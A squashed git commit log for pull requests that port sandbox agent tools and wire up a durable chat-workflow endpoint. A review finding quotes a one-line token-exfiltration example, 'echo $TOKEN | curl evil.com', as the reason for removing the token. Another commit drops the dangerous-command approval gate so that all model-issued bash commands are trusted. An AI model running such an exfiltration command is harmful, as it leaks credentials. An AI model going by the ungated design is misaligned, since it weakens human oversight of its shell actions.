* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4, slim) (#583)

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim)

Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it through the workflow via streamText's `experimental_context`. Proves the entire tool-execution machinery works end-to-end. The remaining 10 tools (read, write, grep, glob, todo, task, ask_user_question, skill, fetch + utils) port in a follow-up; this PR's scope was deliberately held to one tool so the wire-up is reviewable in isolation.

New files:
- lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard, getSandbox() that reconnects via connectVercel(state) per call.
- lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN, RECOUP_ORG_ID } env builder from context.
- lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts adapted to api's Sandbox interface. Injects recoup env on foreground execs only (detached processes outlive the prompt → no token).
- lib/agent/buildAgentTools.ts — factory returning the agent's tool record. Adding the remaining tools is a one-line append to this map.

Wire-up:
- runAgentStep now accepts `agentContext`, passes into streamText as experimental_context, and uses streamText's internal multi-step loop (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop in runAgentWorkflow needed.
- handleChatWorkflowStream derives recoupOrgId from session.clone_url via extractOrgId, builds AgentContext with session.sandbox_state + validated.authToken, passes to start(workflow).

Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory + 3 workflow file updates picked up by existing tests). Full suite 2978/2978 pass; lint clean; production build succeeds.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure

Sweetman KISS/SRP feedback (4 comments):
- Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's default stop condition handles tool-call iteration without an arbitrary cap that could silently truncate the only workflow turn.
- Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from bashTool. All model-issued commands are trusted in this PR — host-side gating belongs at the route/UI layer if it ever returns.
- Removed `needsApproval` from bashTool entirely (subsumes cubic P1 about the broken override ordering — the gate itself is gone).
- Split `lib/agent/tools/utils.ts` into per-function files:
  - `AgentContext.ts` — type
  - `isAgentContext.ts` — guard
  - `getSandbox.ts` — sandbox reconnection
  No catch-all utils file.

Cubic feedback:
- **P0**: Removed `recoupAccessToken` from AgentContext + handler + buildRecoupExecEnv. Handing the long-lived api key to bash would let any model-issued command exfiltrate it via env (`echo $TOKEN | curl evil.com`). Slim PR 4 has no actual consumer for the token — only the future `skill` tool needs it. Proper short-lived token minting will land alongside that port.
- **P2** (`isAgentContext` too weak): tightened the guard to validate sandbox.state is a non-null object AND sandbox.workingDirectory is a non-empty string. Earlier guard returned true for `{ sandbox: {} }`, letting tools later crash on undefined fields.
- P1 + P2 about stopWhen / needsApproval: resolved by sweetman's deletions above.
- P2 (test file >100 lines): dismissed — same as PR 3 review. The repo has no enforced max-lines rule; existing tests routinely exceed 700 lines.

Tests updated for the new shape. 25 tests in touched files green (8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv + 2 factory). Full suite 2980/2980 pass; lint clean; production build succeeds.
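The tightened `isAgentContext` guard (P2) can be sketched as a plain type predicate. `AgentContextSketch` below is a deliberately reduced, hypothetical shape that contains only the two fields the guard validates. The real `AgentContext` carries more fields. With this guard, the old failure case `{ sandbox: {} }` now returns false.

```typescript
// Reduced, hypothetical shape: only the fields the guard validates.
interface AgentContextSketch {
  sandbox: { state: object; workingDirectory: string };
}

// Require sandbox.state to be a non-null object and sandbox.workingDirectory
// to be a non-empty string, so tools never see half-populated contexts.
function isAgentContext(value: unknown): value is AgentContextSketch {
  if (typeof value !== "object" || value === null) return false;
  const sandbox = (value as { sandbox?: unknown }).sandbox;
  if (typeof sandbox !== "object" || sandbox === null) return false;
  const { state, workingDirectory } = sandbox as {
    state?: unknown;
    workingDirectory?: unknown;
  };
  return (
    typeof state === "object" &&
    state !== null &&
    typeof workingDirectory === "string" &&
    workingDirectory.length > 0
  );
}
```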
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow

Per discussion on PR #583. Restoring the streamText stop condition so the workflow agent gets the model wrap-up turn after a tool call (model → tool → tool-result → model → text response), instead of stopping at streamText's default `stepCountIs(1)` after the first tool call.

DRY by sharing one constant between the two chat endpoints:
- New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts. Inherits the value that /api/chat already uses (originally hardcoded in getGeneralAgent.ts:55) — high enough that normal flows never hit the cap but bounds runaway loops for cost / replay safety.
- lib/agents/generalAgent/getGeneralAgent.ts: imports the constant instead of constructing stepCountIs(111) inline.
- app/lib/workflows/runAgentStep.ts: imports the constant, passes to streamText as `stopWhen`.

Single-shot agents (createCompactAgent, createContentPromptAgent, createEmailReplyAgent) intentionally keep their local `stepCountIs(1)` — they're not in the multi-step chat family.

Full suite 2980/2980 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep… (#585)

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (PR 5)

Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools from open-agents/packages/agent/tools/. Each is a direct port adapted to api's Sandbox interface, registered in buildAgentTools, and ready for the agent to invoke through the existing experimental_context plumbing.
New tool files (one tool per file, per sweetman SRP):
- readFileTool.ts — read with 1-indexed offset/limit, numbered output
- writeFileTool.ts — create / overwrite (with mkdir -p) on sandbox.writeFile
- editFileTool.ts — exact-string replace, ambiguous-match rejection
- grepTool.ts — POSIX ERE search via `grep -rn`, capped at 100/10/200
- globTool.ts — find -printf with mtime sort, GNU/BSD-compatible
- todoWriteTool.ts — stateless planning surface; echoes the list back
- webFetchTool.ts — curl from inside the sandbox, body truncated at 10KB

New helpers (utilities used by multiple tools):
- shellEscape.ts — `'` → `'\''` dance
- toDisplayPath.ts — absolute → relative-when-inside-workdir display path

buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite tools (`task`, `ask_user_question`, `skill`) need subagent context / UI rendering / skill discovery infrastructure not in api today and land in a follow-up PR.

Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite 3014/3014; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent-tools): harmonize tool exports as direct values (drop factory wrappers)

Per PR 585 review question — most tools were defined as `() => tool({...})` factories while two (todoWriteTool, webFetchTool) were direct values. The split was a vestigial copy from open-agents where the factory pattern only made sense for tools that took options (originally bash's ToolOptions, which sweetman had me remove in PR 4 review). AI SDK's `tool()` helper returns a plain value with no per-call state, so the factory wrappers added nothing.

Harmonized to direct-value exports across all 8 tools:
- bashTool, readFileTool, writeFileTool, editFileTool, grepTool, globTool: dropped the `() =>` wrapper.
- buildAgentTools.ts: dropped the matching `()` calls.
- 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly).
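The two shared helpers from the list can be sketched as follows. The `'\''` trick closes the single-quoted string, emits an escaped literal quote, and reopens the quote. Inside POSIX single quotes every other character is literal. The `toDisplayPath` behaviour for paths outside the working directory, and the "." returned for the directory itself, are assumptions based on the one-line description.

```typescript
import { posix } from "node:path";

// Wrap in single quotes; each embedded ' becomes '\'' (close, escaped quote, reopen).
function shellEscape(value: string): string {
  return `'${value.replace(/'/g, `'\\''`)}'`;
}

// Show paths inside the working directory relative to it; leave all others absolute.
function toDisplayPath(absolutePath: string, workingDirectory: string): string {
  const rel = posix.relative(workingDirectory, absolutePath);
  if (rel === "") return "."; // the working directory itself (assumption)
  if (rel === ".." || rel.startsWith("../") || posix.isAbsolute(rel)) return absolutePath;
  return rel;
}
```

`posix.relative` avoids the prefix bug that a naive `startsWith(workingDirectory)` check would have. With that check, `/workspace/x` would be treated as inside `/work`.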
Full suite 3014/3014 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) (#587)

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim)

Ports the `skill` composite tool from open-agents along with the skill discovery layer it depends on. The handler now connects to the sandbox before workflow start, scans `${workingDirectory}/skills/` for project-level skills, and threads the catalog into the workflow via `AgentContext.skills`. The `skill` tool is registered in `buildAgentTools` only when the catalog is non-empty — so models in sandboxes without skills never see the tool.

New skills layer (lib/skills/):
- skillTypes.ts — SkillMetadata, SkillOptions, skillFrontmatterSchema, frontmatterToOptions (Zod schema + camelCase normalization)
- parseSkillFrontmatter.ts — hand-rolled YAML subset parser (key:value, quoted strings, booleans; preserves colons in URLs)
- extractSkillBody.ts — strip frontmatter, return body
- substituteArguments.ts — $ARGUMENTS replacement
- injectSkillDirectory.ts — prepend `Skill directory: <path>`
- discoverSkills.ts — scan dirs, parse frontmatter, dedupe by name, drop names that shadow built-in /model /resume /new
- getSandboxSkillDirectories.ts — slim: `[${workingDirectory}/skills]` only. Global skills (~/.skills) port later alongside short-lived token minting

New tool: lib/agent/tools/skillTool.ts — case-insensitive lookup, respects `disable-model-invocation`, surfaces available-skills list on unknown name. Loads SKILL.md content, applies extractSkillBody → injectSkillDirectory → substituteArguments, returns to the model.
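The skillTool content pipeline (extractSkillBody → injectSkillDirectory → substituteArguments) can be sketched as three composable string functions. Several details here are assumptions: the `---` frontmatter delimiters, the blank line after the `Skill directory:` header, the `trimStart()` on the body, and replacing `$ARGUMENTS` with an empty string when no arguments are passed. `renderSkill` is a hypothetical composition helper.

```typescript
// Strip a leading `---` ... `---` frontmatter block, if present, and return the body.
function extractSkillBody(markdown: string): string {
  const match = /^---\r?\n[\s\S]*?\r?\n---\r?\n?/.exec(markdown);
  return (match ? markdown.slice(match[0].length) : markdown).trimStart();
}

// Prepend the directory header so the model can resolve files relative to the skill.
function injectSkillDirectory(body: string, skillDirectory: string): string {
  return `Skill directory: ${skillDirectory}\n\n${body}`;
}

// Replace every $ARGUMENTS placeholder; defaults to "" when none are given (assumption).
function substituteArguments(body: string, args = ""): string {
  return body.split("$ARGUMENTS").join(args);
}

// Hypothetical composition in the order the commit message lists.
function renderSkill(markdown: string, skillDirectory: string, args?: string): string {
  return substituteArguments(injectSkillDirectory(extractSkillBody(markdown), skillDirectory), args);
}
```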
Wire-up:
- AgentContext gains `skills?: SkillMetadata[]`
- buildAgentTools accepts `{ skills }`, registers skill tool when non-empty
- runAgentStep passes `agentContext.skills` to buildAgentTools
- handleChatWorkflowStream connects sandbox + discoverSkills before start(workflow); empty catalog on discovery failure (best-effort, never blocks the request)

Slim scope decisions:
- Project skills only (no global ~/.skills/ scan yet)
- No short-lived token minting; the recoup-api skill would still load + return content, but its curl examples wouldn't authenticate without ad-hoc credentials. Token minting becomes a separate PR where it can be designed properly (Privy JWT vs server-minted JWT scoped to accountId + sandbox session).

Tests: 35 new (4 extractSkillBody + 4 substituteArguments + 2 injectSkillDirectory + 7 parseSkillFrontmatter + 9 discoverSkills + 7 skillTool + 4 buildAgentTools updated). Full suite 3049/3049 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(skills): match open-agents 3-path scan (was scanning the wrong dir)

The slim getSandboxSkillDirectories looked at ${workingDirectory}/skills/ — a path that doesn't exist in real recoupable sandboxes. The actual layout (mirrored from open-agents/apps/web/lib/skills/directories.ts):
- ${workingDirectory}/.claude/skills/ (project, claude-style)
- ${workingDirectory}/.agents/skills/ (project, agents-style)
- ${HOME}/.agents/skills/ (global; populated at provisioning by installSessionGlobalSkills)

Also drops the earlier deferral comment: global skills load fine WITHOUT short-lived token minting. The skill tool returns SKILL.md content to the model; only the curl examples *inside* SKILL.md need auth credentials, and those can be supplied ad-hoc until proper token minting lands.
Changes:
- getSandboxSkillDirectories now async (uses resolveSandboxHomeDirectory to find the sandbox's actual $HOME — defaults to /root)
- exports the two sub-functions (getProjectSkillDirectories + getGlobalSkillsDirectory) so they're individually testable
- Handler awaits the async path resolution
- New test suite covers all 3 paths + $HOME variants

Caught by sweetman pointing out that this same repo (org-rostrum-pacific) DOES show skills in open-agents — proving the slim deferral was wrong.

Full suite 3053/3053; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): YAGNI project-dir scan + extract getSkills (per PR 587 feedback)

Two changes per user direction:

1. **YAGNI: drop project-skill directory scanning.** All skills are provisioned globally via `installSessionGlobalSkills` at sandbox startup — org repos do NOT bundle their own skill directories. getSandboxSkillDirectories now returns just the single global path: `${HOME}/.agents/skills`. Deleted getProjectSkillDirectories and the PROJECT_SKILL_BASE_FOLDERS array.

2. **SRP: extract getSkills into its own file.** Previously inline in skillTool.ts (per sweetman comment on PR 587). Now lives at lib/skills/getSkills.ts with its own tests. Future skill-aware consumers (e.g. system-prompt builders) share the same accessor instead of duplicating the context-cast.

Verified live on preview against `recoupable/org-rostrum-pacific-...` BEFORE this commit:
- Sandbox provisioning installs 2 globals at /home/vercel-sandbox/.agents/skills/ (recoup-api + artist-workspace)
- Agent invoked `skill({ skill: "recoup-api" })` successfully, received 11,173 chars of SKILL.md content with the correct "Skill directory: /home/vercel-sandbox/.agents/skills/recoup-api" header

Full suite 3055/3055; lint clean; production build succeeds.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): SRP — extract findSkillFile + getGlobalSkillsDirectory

Per sweetman PR review (comments r3283710486 and r3283762023). Each helper now lives in its own file with its own focused test suite:
- lib/skills/findSkillFile.ts — was inlined in discoverSkills.ts
  - 3 new unit tests (prefer SKILL.md, fall back to skill.md, null when neither exists)
- lib/skills/getGlobalSkillsDirectory.ts — was inlined in getSandboxSkillDirectories.ts
  - 2 new unit tests (standard path, trailing-slash tolerance)

discoverSkills now imports findSkillFile. getSandboxSkillDirectories imports getGlobalSkillsDirectory. The old getSandboxSkillDirectories test loses its inline getGlobalSkillsDirectory cases (those moved to the dedicated test file).

Full suite passes; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port task + ask_user_question composite tools (PR 7) (#589)

* feat(chat-workflow): port task + ask_user_question composite tools (PR 7)

Completes the open-agents tool surface. The agent now has all 11 tools.

**ask_user_question** (lib/agent/tools/askUserQuestionTool.ts) — client-side tool with NO server execute. Schema mirrors open-agents verbatim (questions array, options with label/description, multiSelect flag, max 12-char header). streamText halts after emitting the tool-call because there's no result to feed back; the chat UI renders the question component, collects answers, and submits them in the next workflow request's messages array. No WDK pause/resume hook needed.

**task** (lib/agent/tools/taskTool.ts) — slim port of open-agents' multi-type SUBAGENT_REGISTRY → one generic subagent. Runs a sub-`streamText` loop with a curated subagent tool set (`read, write, edit, grep, glob, bash`) matching open-agents' `executor` subagent.
The subagent tool set deliberately EXCLUDES:
- task (recursion guard: open-agents' three subagent types, executor/explorer/design, all explicitly omit task too; subagents are leaves of the agent tree)
- ask_user_question, skill, todo_write, web_fetch (parity with open-agents subagent curation; subagents run autonomously, don't plan from scratch, don't make web calls, and don't load further skills)

AgentContext gains `modelId?: string` so the subagent can use the same model as its parent. The handler populates it from chat.model_id or the platform default.

buildAgentTools registers both new tools unconditionally (skill stays conditional on a non-empty catalog).

Quirk: api's AI SDK (6.0.0-beta.122) calls toModelOutput(output) directly, NOT toModelOutput({ output }) as open-agents' newer 6.0.165 does. askUserQuestionTool uses the direct signature.

Tests: 9 askUserQuestionTool + 6 taskTool + updated buildAgentTools + AgentContext updates. Full suite 3075/3075 pass, lint clean, production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(task-tool): provide non-empty subagent prompt

The subagent's streamText was invoked with messages: [] and only a system prompt, so the AI SDK recorded zero steps and threw NoOutputGeneratedError, surfaced to the parent as "Subagent failed: No output generated. Check the stream for errors."

Pass an explicit user-side trigger prompt, mirroring open-agents' task tool. Adds a regression test that asserts streamText receives either a non-empty prompt or non-empty messages.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(task-tool): extract buildSubagentTools (SRP) + drop modelId from AgentContext (KISS)

Address PR review feedback:
- SRP: move buildSubagentTools to lib/agent/tools/buildSubagentTools.ts (one exported function per file).
- KISS: open-agents' AgentContext type does not have modelId; it uses model: LanguageModel / subagentModel?: LanguageModel. api can't follow that exact shape because agentContext is part of a durable Vercel Workflow input and LanguageModel objects aren't JSON-serializable. Instead of inventing modelId on AgentContext, hardcode a default subagent model id in taskTool. A subagentModelId override field can be added if/when a real consumer needs it.

Also format-fixes the askUserQuestionTool.ts toModelOutput arrow (parentheses around a single param, flagged by prettier in CI).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent): align AgentContext + model resolution with open-agents

Match open-agents' `tools/utils.ts` + `types.ts` shape so the subagent inherits the parent's model (rather than the previous hardcoded SUBAGENT_MODEL_ID):
- AgentContext gains `model: LanguageModel` (required) and `subagentModel?: LanguageModel`, mirroring open-agents.
- Introduce `DurableAgentContext = Omit<AgentContext, "model" | "subagentModel">` for the workflow input shape, since LanguageModel instances aren't JSON-serializable and can't ride durable Vercel Workflow inputs.
- runAgentStep constructs `callModel = gateway(input.modelId)` once per step and merges it into experimental_context, the same pattern as open-agents' prepareCall in open-harness-agent.ts.
- New getMainModel / getSubagentModel helpers (SRP, one per file) mirror open-agents' utility functions: getSubagentModel returns `ctx.subagentModel ?? ctx.model`.
- taskTool drops the hardcoded SUBAGENT_MODEL_ID and calls getSubagentModel(experimental_context, "task") instead, so the subagent now defaults to the same model the parent is running.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
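A minimal TypeScript sketch of the model-inheritance and subagent tool-curation rules above. It assumes a simplified `Model` type in place of the AI SDK's `LanguageModel` and a plain record of tools; `Model`, `workingDirectory`, and the allowlist-filter approach to buildSubagentTools are illustrative assumptions. The real getSubagentModel also takes a tool name, and the real buildSubagentTools may construct its tools differently.

```typescript
// Hypothetical stand-in for the AI SDK's LanguageModel (not imported here).
type Model = { modelId: string };

interface AgentContext {
  model: Model; // required: the parent's model, resolved per step
  subagentModel?: Model; // optional override for the task subagent
  workingDirectory: string; // illustrative serializable field
}

// Durable workflow input: model instances are not JSON-serializable, so they are omitted.
type DurableAgentContext = Omit<AgentContext, "model" | "subagentModel">;

// The subagent inherits the parent's model unless an override is set.
function getSubagentModel(ctx: AgentContext): Model {
  return ctx.subagentModel ?? ctx.model;
}

// Executor-style allowlist: task, ask_user_question, skill, todo_write and
// web_fetch are intentionally absent, so a subagent cannot recurse into task.
const SUBAGENT_TOOL_NAMES = ["read", "write", "edit", "grep", "glob", "bash"] as const;

function buildSubagentTools<T>(parentTools: Record<string, T>): Record<string, T> {
  const picked: Record<string, T> = {};
  for (const toolName of SUBAGENT_TOOL_NAMES) {
    const candidate = parentTools[toolName];
    if (candidate !== undefined) picked[toolName] = candidate;
  }
  return picked;
}
```

Keeping the allowlist as data makes the recursion guard visible at a glance: adding `task` to a subagent would require editing this one constant.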

* feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579)

* feat(chat-workflow): add POST /api/chat/workflow route stub

Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed chat endpoint documented in recoupable/docs#221. The stub validates the full request contract (auth, body, session/chat ownership, sandbox active) and returns a hardcoded UIMessage stream with an `x-workflow-run-id: stub-<uuid>` header, so the chat-side team can integrate against the real response shape today while the workflow itself is ported from open-agents in follow-up PRs.

Files:
- app/api/chat/workflow/route.ts: thin POST shim + OPTIONS for CORS
- lib/chat/handleChatWorkflowStream.ts: auth → validate → session/chat ownership → sandbox check → stub UIMessage stream
- lib/chat/validateChatWorkflowBody.ts: Zod schema matching the OpenAPI ChatWorkflowRequest (messages, chatId, sessionId, optional context.contextLimit)

Status codes implemented (matching the contract docs):
- 200: UIMessage stream + x-workflow-run-id header
- 400: invalid JSON / invalid body / "Sandbox not initialized"
- 401: validateAuthContext passthrough
- 403: session not owned by the API key's account
- 404: session or chat not found (incl. chat under a different session)
- 500: selectSessions returned null (DB error)

409 (duplicate workflow run for a chat) is deferred to the wire-up PR that adds compareAndSetChatActiveStreamId; there is no workflow to dedupe yet.

Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — SRP/DRY cleanup

Two review fixes per PR feedback:

1. SRP/DRY: drop the local errorResponse helper from handleChatWorkflowStream.ts; use the shared lib/networking/errorResponse and lib/zod/validationErrorResponse helpers instead.
2. SRP: move auth + body parsing out of handleChatWorkflowStream.ts into the validator. Rename validateChatWorkflowBody → validateChatWorkflow so it accepts a full NextRequest (like the existing validateChatRequest) and returns an auth-augmented body (accountId/orgId/authToken). The handler now opens with a single `validateChatWorkflow(request)` call.

Tests reshaped to match the new seams:
- Validator test mocks validateAuthContext only
- Handler test mocks validateChatWorkflow (the new seam)
- Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed into a single "validator short-circuit passes through" test; both cases are now the validator's responsibility, not the handler's

22/22 new tests green; full suite 2900/2900 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* chore: revert unrelated local changes accidentally swept into PR

Previous commit (9262f65) used `git add -A`, which picked up local Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak that aren't part of this PR's scope. Removing them now so the PR diff stays scoped to the chat-workflow refactor.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow (PR 3 of 4) (#581)

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow

Replaces the stub UIMessage stream from PR #579 with a real Vercel Workflow agent loop. Stub run IDs (`stub-<uuid>`) are replaced with real ones (`wrun_<id>`) emitted by the workflow runtime.

Tools are still NOT wired: the workflow runs streamText with the gateway model + Recoup custom instructions only. The sandbox tool surface comes in a follow-up PR.
What's now plumbed end-to-end:
- validateChatWorkflow → session+chat ownership → sandbox active → reconcile existing active_stream_id (resume / 409 / fall-through) → refresh lifecycle activity → fire-and-forget persist user message → start runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) → return run.getReadable() with x-workflow-run-id header

New helpers (Supabase):
- compareAndSetChatActiveStreamId: atomic CAS on chats.active_stream_id
- touchChat: bump chats.updated_at
- updateChat: generic partial update mirroring updateSession's shape
- createChatMessageIfNotExists: INSERT ... ON CONFLICT DO NOTHING via upsert
- isFirstChatMessage: true iff exactly one row exists matching messageId

New helpers (chat/recoupable):
- extractOrgId: `org-<slug>-<uuid>` → uuid (lowercased)
- agentCustomInstructions: assistantFileLinkPrompt + recoupApiSkillPrompt
- persistLatestUserMessage: fire-and-forget user message + title from the first 80 characters
- reconcileExistingActiveStream: 3-attempt resume/clear/conflict loop

New workflow files:
- app/workflows/runAgentWorkflow.ts: `"use workflow"`, agent loop wrapper
- app/workflows/runAgentStep.ts: `"use step"`, single streamText turn

Tests: 46 new (8 extractOrgId + 5 CAS + 3 touchChat + 2 updateChat + 3 createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest + 6 reconcileExistingActiveStream + 18 handler wire-up tests refactored). Full suite: 2946/2946 pass, lint clean.

Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools). Without tools, `finishReason` is always "stop" after one turn; the runAgentWorkflow loop shape is in place but only iterates once today.
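Two of the chat/recoupable helpers listed above are small string transforms. A hedged sketch, assuming extractOrgId receives a string containing an `org-<slug>-<uuid>` segment (for example a clone URL) and returns `null` when none is found, and assuming the 80-character title budget uses the single-character `…` suffix adopted in the review follow-up. `deriveTitle` is a hypothetical name; the real logic lives inside persistLatestUserMessage.

```typescript
// `org-<slug>-<uuid>`: the slug is matched lazily, so the capture starts at the
// first UUID-shaped run that follows it.
const ORG_REPO_PATTERN =
  /org-[a-z0-9-]+?-([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})/i;

function extractOrgId(value: string): string | null {
  const match = ORG_REPO_PATTERN.exec(value);
  // Lowercase so IDs compare equal regardless of input casing.
  return match?.[1]?.toLowerCase() ?? null;
}

const TITLE_MAX_LENGTH = 80;
const TITLE_SUFFIX = "…"; // one UTF-16 code unit, unlike "..." (three)

// Hypothetical helper: trims, then truncates so the result never exceeds the max.
function deriveTitle(text: string): string {
  const trimmed = text.trim();
  if (trimmed.length <= TITLE_MAX_LENGTH) return trimmed;
  // Reserve room for the suffix so body + suffix is exactly TITLE_MAX_LENGTH.
  return trimmed.slice(0, TITLE_MAX_LENGTH - TITLE_SUFFIX.length) + TITLE_SUFFIX;
}
```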
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — structural + P1/P2 fixes

Sweetman structural feedback (KISS / OCP):
- Move workflow files: app/workflows/runAgent{Workflow,Step}.ts → app/lib/workflows/runAgent{Workflow,Step}.ts
- Generic Supabase helpers + domain wrappers:
  - Generic `updateChat({filter, updates})` with an optional CAS predicate on active_stream_id. Subsumes compareAndSetChatActiveStreamId and touchChat (both deleted).
  - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces the domain-specific isFirstChatMessage. The "is earliest?" check now lives in persistLatestUserMessage, where it belongs.
  - Rename createChatMessageIfNotExists → `upsertChatMessage` with a discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so callers can tell duplicates from DB errors.
- Extract the resume-stream block from the handler into `maybeResumeChatStream.ts` (OCP: the handler stays small, and resume logic can grow independently).

cubic P1 fixes:
- CAS-before-start: the handler now claims `active_stream_id` with a `pending-<uuid>` placeholder BEFORE calling start(workflow). This closes the race where two requests could both bill the model before one lost the CAS. After start(), the handler promotes the placeholder to the real run ID.
- updateChat returns a discriminated `{ok, rowsUpdated} | {ok:false, error}` so callers can distinguish "race lost" (rowsUpdated: 0) from DB errors.
- reconcileExistingActiveStream: the bare try/catch around getRun no longer clears a stale active_stream_id on transient workflow API failures; any uncertainty is now treated as a conflict. A failed CAS-clear on a completed run also returns conflict (rather than possibly falling through to ready on a DB read error).
- The handler now awaits getRun(runId).cancel(); previously the cancellation was fired without await, so its failure could escape the try/catch.

cubic P2 fixes:
- updateChat's `updates` parameter is narrowed to `ChatMutableFields` (excludes id, session_id, created_at).
- persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH exactly. It uses "…" (1 char) instead of "..." (3 chars) and slices the body to the max minus the suffix length.
- runAgentStep: acquire the writer once and release it in `finally`. Per-chunk writer acquisition could leak the lock on write failure.
- runAgentWorkflow: capped at a single turn until messages threading lands with the tool ports (PR 4). Re-running the loop with the same input was unsafe, so it now logs a warning and exits if the model returns tool calls.

Tests reworked: 231 in the touched files all green; full suite 2949/2949; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): top-level import in reconcileExistingActiveStream

The dynamic `await import("workflow/api")` inside the function body was a carry-over from open-agents. handleChatWorkflowStream.ts already imports `start` and `getRun` from the same package at the top level, so there's no reason for the lib to defer. Moving to a normal top-level import for consistency.

Also tightens the cancel-throws handler test to use the same deferred-rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's unhandled-rejection watcher doesn't trip on the mock setup.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): move active_stream_id CAS out of supabase lib

Per sweetman's review on updateChat.ts:64, the active_stream_id-specific predicate logic doesn't belong in the Supabase plumbing. Restructured:
- `lib/supabase/chats/updateChat.ts` is now generic. The filter accepts `where: Partial<Tables<"chats">>` (a generic predicate that maps to `column = value` or `column IS NULL`), so no column name is hardcoded in the Supabase lib.
- `lib/chat/compareAndSetChatActiveStreamId.ts`: new domain wrapper. It owns the "compare-and-set on active_stream_id" concept and returns a discriminated `{ok, claimed} | {ok: false, error}` result. The handler and reconcileExistingActiveStream both compose against this wrapper instead of constructing predicates inline.
- Handler + reconcile updated to use the wrapper. Tests follow.

37/37 tests in touched files pass; full suite 2955/2955; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth

Two production-build issues surfaced by Vercel that local `pnpm test` + tsc didn't catch (vitest uses esbuild transpilation with no type check; tsc's errors were all in __tests__ and unrelated to this PR).

1. `compareAndSetChatActiveStreamId.ts`: `if (result.ok) { ... }` narrowing wasn't kicking in under Next.js's strict TS plugin. Switched to `if ("error" in result)` (in-operator narrowing), which reliably discriminates the union members regardless of literal-type inference quirks.
2. `lib/supabase/chats/updateChat.ts`: `let query = supabase.from(...).update(...).eq(...)` plus reassignment in a `for` loop (`.is()` / `.eq()` per where entry) caused "type instantiation is excessively deep", because Supabase's PostgrestFilterBuilder is heavily generic and the reassignment kept expanding the type. Rewrote it to split the where map into equality matches (one `.match(obj)` call) + nullable columns (reduced with `.is(col, null)`, typed back to the original builder).

Both bugs were behavior-neutral; the function shape and contract are unchanged.

